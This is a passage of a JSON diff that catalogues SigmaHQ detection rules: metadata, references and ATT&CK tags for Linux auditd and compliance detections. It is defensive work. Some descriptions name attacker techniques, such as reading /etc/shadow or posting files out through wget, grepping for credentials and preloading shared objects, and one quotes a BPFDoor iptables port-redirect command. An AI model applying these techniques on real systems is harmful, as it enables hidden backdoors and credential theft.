"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" + ], + "tags": "No established tags" + }, + "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "value": "Group Modification Logging" + }, + { + "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/19", + "falsepositive": "No established falsepositives", + "filename": "host_without_firewall.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" + ], + "tags": "No established tags" + }, + "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", + "value": "Host Without Firewall" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + 
"Unknown" + ], + "filename": "netflow_cleartext_protocols.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", + "value": "Cleartext Protocol Usage Via Netflow" + }, + { + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "workstation_was_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" + ], + "tags": "No established tags" + }, + "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "value": "Locked Workstation" + }, + { + "description": "Detects change of user environment. 
Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "meta": { + "author": "Peter Matkovski", + "creation_date": "2019/05/12", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_alter_bash_profile.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" + ], + "tags": [ + "attack.s0003", + "attack.persistence", + "attack.t1546.004" + ] + }, + "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "value": "Edit of .bash_profile and .bashrc" + }, + { + "description": "Detects attempts to record audio with arecord utility", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_audio_capture.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://linux.die.net/man/1/arecord", + "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", + "https://attack.mitre.org/techniques/T1123/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "value": "Audio Capture" + }, + { + "description": "Detect changes in auditd configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_auditing_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + 
"Self Experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", + "value": "Auditing Configuration Changes on Linux Host" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate script work" + ], + "filename": "lnx_auditd_binary_padding.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", + "value": "Binary Padding - Linux" + }, + { + "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_auditd_bpfdoor_file_accessed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.t1059" + ] + }, + "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", + "value": 
"BPFDoor Abnormal Process ID or Lock File Accessed" + }, + { + "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate ports redirect" + ], + "filename": "lnx_auditd_bpfdoor_port_redirect.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "value": "Bpfdoor TCP Ports Redirect" + }, + { + "description": "Detects attempts to discover the files with setuid/setgid capability on them. 
That would allow adversary to escalate their privileges.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/28", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_capabilities_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://man7.org/linux/man-pages/man8/getcap.8.html", + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", + "https://mn3m.info/posts/suid-vs-capabilities/", + "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" + ], + "tags": [ + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" + ] + }, + "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + "value": "Linux Capabilities Discovery" + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_change_file_time_attr.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", + "value": "File Time Attribute Change - Linux" + }, + { + "description": "Detects removing immutable file attribute.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "Administrator 
interacting with immutable files (e.g. for instance backups)." + ], + "filename": "lnx_auditd_chattr_immutable_removal.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "value": "Remove Immutable File Attribute - Auditd" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/24", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "value": "Clipboard Collection with Xclip Tool - Auditd" + }, + { + "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + 
"creation_date": "2021/10/01", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_image_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "f200dc3f-b219-425d-a17e-c38467364816", + "value": "Clipboard Collection of Image Data with Xclip Tool" + }, + { + "description": "Detects command line parameter very often used with coin miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/09", + "falsepositive": [ + "Other tools that use a --cpu-priority flag" + ], + "filename": "lnx_auditd_coinminer.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://xmrig.com/docs/miner/command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "value": "Possible Coin Miner CPU Priority Param" + }, + { + "description": "Detects the creation of a new user account. 
Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "meta": { + "author": "Marie Euler", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_create_account.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "MITRE Attack technique T1136; Create Account ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ] + }, + "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "value": "Creation Of An User Account" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", + "value": "CVE-2021-3156 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": 
"2021/02/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ] + }, + "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", + "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing" + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/27", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_cve_2021_4034.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/berdav/CVE-2021-4034", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", + "https://access.redhat.com/security/cve/CVE-2021-4034", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", + "value": "CVE-2021-4034 Exploitation Attempt" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate use of archiving tools by legitimate user." 
+ ], + "filename": "lnx_auditd_data_compressed.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "value": "Data Compressed" + }, + { + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/18", + "falsepositive": [ + "Legitimate usage of wget utility to post a file" + ], + "filename": "lnx_auditd_data_exfil_wget.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/tactics/TA0010/", + "https://linux.die.net/man/1/wget", + "https://gtfobins.github.io/gtfobins/wget/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "value": "Data Exfiltration with Wget" + }, + { + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." 
+ ], + "filename": "lnx_auditd_dd_delete_file.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "value": "Overwriting the File with Dev Zero or Null" + }, + { + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/01/22", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_disable_system_firewall.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://attack.mitre.org/techniques/T1562/004/", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" + ], + "tags": [ + "attack.t1562.004", + "attack.defense_evasion" + ] + }, + "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", + "value": "Disable System Firewall" + }, + { + "description": "Detects file and folder permission changes.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "User interacting with files permissions (normal/daily behaviour)." 
+ ], + "filename": "lnx_auditd_file_or_folder_permissions.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "value": "File or Folder Permissions Change" + }, + { + "description": "Detecting attempts to extract passwords with grep", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_find_cred_in_files.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", + "value": "Credentials In Files - Linux" + }, + { + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . 
as the first character", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_files_directories.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://attack.mitre.org/techniques/T1564/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "value": "Hidden Files and Directories" + }, + { + "description": "Detects appending of zip file to image", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", + "value": "Steganography Hide Zip Information in Picture File" + }, + { + "description": "Detect attempt to enable auditing of TTY input", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/05/24", + "falsepositive": [ + "Administrative work" + ], + "filename": "lnx_auditd_keylogging_with_pam_d.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://attack.mitre.org/techniques/T1003/", + "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ] + }, + "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", + "value": "Linux Keylogging with Pam.d" + }, + { + "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_ld_so_preload_mod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.006" + ] + }, + "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "value": "Modification of ld.so.preload" + }, + { + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate 
the privileges.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_load_module_insmod.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1547/006/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", + "https://linux.die.net/man/8/insmod", + "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.006" + ] + }, + "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "value": "Loading of Kernel Module via Insmod" + }, + { + "description": "Detect changes of syslog daemons configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_logging_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "self experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", + "value": "Logging Configuration Changes on Linux Host" + }, + { + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": "No established falsepositives", 
+ "filename": "lnx_auditd_masquerading_crond.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "value": "Masquerading as Linux Crond Process" + }, + { + "description": "Detects enumeration of local or remote network services.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/21", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_network_service_scanning.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "3761e026-f259-44e6-8826-719ed8079408", + "value": "Linux Network Service Scanning - Auditd" + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." 
+ ], + "filename": "lnx_auditd_network_sniffing.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", + "value": "Network Sniffing - Linux" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/09/17", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
